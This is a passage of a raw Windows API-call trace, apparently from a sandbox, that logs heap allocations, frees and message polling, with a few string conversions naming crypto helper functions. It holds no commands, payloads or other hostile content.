CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x542a) returned 0x900190 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x542a) returned 0xbef450 [0191.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.067] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0191.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0191.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.067] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.068] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.068] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.069] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.070] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0191.070] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.071] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.074] RtlAllocateHeap 